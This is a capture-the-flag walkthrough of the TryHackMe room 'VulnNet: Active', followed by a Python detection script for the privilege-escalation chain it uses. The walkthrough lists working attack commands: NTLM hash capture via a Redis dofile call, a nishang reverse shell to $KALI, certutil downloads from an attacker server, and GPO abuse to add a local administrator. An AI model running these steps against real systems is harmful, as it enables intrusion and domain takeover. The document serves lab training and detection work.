Room Link: https://tryhackme.com/r/room/vulnnetactive
Scans
Kali
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/139 - NetBIOS
Kali
Kali
TCP/445 - SMB
No results. Couldn't login anonymously.
Kali
smbclient -L //$VICTIM/
TCP/6379 - Redis
Added active.thm
Kali
redis-cli -h active.thm
Kali(redis-cli)
Kali
responder -I ens5 -dvw
Kali(redis-cli)
eval "dofile('//$KALI/share')" 0
Kali
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
TCP/445 - SMB
Kali
smbclient -L //$VICTIM/ -U enterprise-security
Password: sand_0873959498
Download files
Kali
smbclient \\\\$VICTIM\\Enterprise-Share -U enterprise-security
Password: sand_0873959498
Kali(smbclient)
Kali
cat PurgeIrrelevantData_1826.ps1
Initial Shell
Kali
git clone https://github.com/samratashok/nishang.git
cd nishang/Shells/
subl Invoke-PowerShellTcp.ps1
Append the following line to the end of Invoke-PowerShellTcp.ps1 so the reverse shell starts as soon as the script is executed
Kali(subl)
Invoke-PowerShellTcp -Reverse -IPAddress $KALI -Port 4444
Kali
cp Invoke-PowerShellTcp.ps1 PurgeIrrelevantData_1826.ps1
Upload payload
Kali(smbclient)
put PurgeIrrelevantData_1826.ps1
After a few moments we get a connection.
Kali
Privilege Escalation
Download SharpHound PS1
This failed because when running the script it would just hang and I had to reset the server. So after that I tried with the exe.
Kali
git clone https://github.com/BloodHoundAD/BloodHound.git
cp BloodHound/Collectors/SharpHound.ps1 .
python2 -m SimpleHTTPServer 82
Victim(Powershell)
certutil -urlcache -f http://$KALI:82/SharpHound.ps1 SharpHound.ps1
powershell -ep bypass
.\SharpHound.ps1
Download SharpHound EXE
Kali
git clone https://github.com/BloodHoundAD/BloodHound.git
cp BloodHound/Collectors/SharpHound.exe .
python2 -m SimpleHTTPServer 82
Victim(Powershell)
certutil -urlcache -f http://$KALI:82/SharpHound.exe SharpHound.exe
SharpHound.exe
Transfer results to Kali
Victim(Powershell)
copy 20240405092615_BloodHound.zip C:\Enterprise-Share\
Kali(smbclient)
get 20240405092615_BloodHound.zip
BloodHound
Kali #1
Kali #2
bloodhound --no-sandbox
We can just drag the zip file to bloodhound to import it.
Find Shortest Paths to Domain Admins
Our user enterprise-security has write access to the GPO called "SECURITY-POL-VN".
SharpGPOAbuse
Kali
git clone https://github.com/byronkg/SharpGPOAbuse.git
cp SharpGPOAbuse/SharpGPOAbuse-master/SharpGPOAbuse.exe .
python2 -m SimpleHTTPServer 82
Victim(Powershell)
certutil -urlcache -f http://$KALI:82/SharpGPOAbuse.exe SharpGPOAbuse.exe
The scheduled task created by this GPO runs a single command: adding our user enterprise-security to the local Administrators group.
Victim(Powershell)
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "privesc" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
After the change is successful we just need to push the GPO update for it to take effect.
Victim(Powershell)
Kali
psexec.py enterprise-security:sand_0873959498@$VICTIM
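From the defender's side, the GPO-abuse chain above leaves three distinct Windows Security events: a Group Policy object edited by a low-privileged account, a scheduled task whose action is `net localgroup administrators ... /add`, and the resulting local group membership change. The following detection logic is an added example, not part of the original writeup; the event records are constructed and simplified (field names and the allow-list of expected GPO editors are assumptions, not the exact Windows schema).

```python
import re

# Task action that adds a principal to the local Administrators group
# (the command the GPO-pushed task runs in this room).
ADMIN_ADD_RE = re.compile(
    r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.IGNORECASE)

# Accounts expected to edit Group Policy objects (assumed allow-list).
EXPECTED_GPO_EDITORS = {"vulnnet\\administrator"}


def classify(event):
    """Return an alert string for a suspicious event, or None if benign."""
    eid = event["EventID"]
    actor = event.get("SubjectUser", "").lower()
    # 5136: directory service object modified; flag GPO edits by unexpected accounts
    if eid == 5136 and event.get("ObjectClass") == "groupPolicyContainer":
        if actor not in EXPECTED_GPO_EDITORS:
            return "GPO modified by unexpected account"
    # 4698: scheduled task created; inspect the task's command line
    elif eid == 4698 and ADMIN_ADD_RE.search(event.get("TaskContent", "")):
        return "scheduled task adds an account to local Administrators"
    # 4732: member added to a security-enabled local group
    elif eid == 4732 and event.get("GroupName", "").lower() == "administrators":
        return "member added to local Administrators"
    return None


def scan(events):
    """Return (EventID, SubjectUser, alert) for every event classify() flags."""
    hits = []
    for ev in events:
        alert = classify(ev)
        if alert:
            hits.append((ev["EventID"], ev.get("SubjectUser"), alert))
    return hits


# Constructed sample records; the last one is a benign task and must not fire.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUser": "VULNNET\\enterprise-security",
     "ObjectClass": "groupPolicyContainer", "ObjectName": "SECURITY-POL-VN"},
    {"EventID": 4698, "SubjectUser": "VULNNET\\enterprise-security",
     "TaskName": "\\privesc",
     "TaskContent": "<Exec><Command>cmd.exe</Command><Arguments>/c net "
                    "localgroup administrators enterprise-security /add</Arguments></Exec>"},
    {"EventID": 4732, "SubjectUser": "NT AUTHORITY\\SYSTEM",
     "GroupName": "Administrators", "MemberName": "enterprise-security"},
    {"EventID": 4698, "SubjectUser": "VULNNET\\administrator",
     "TaskName": "\\nightly-backup",
     "TaskContent": "<Exec><Command>backup.exe</Command><Arguments>/full</Arguments></Exec>"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Correlating these three alerts on the same host within a short window is a much stronger signal than any one of them alone, since legitimate GPO edits and scheduled-task creation are routine in a domain.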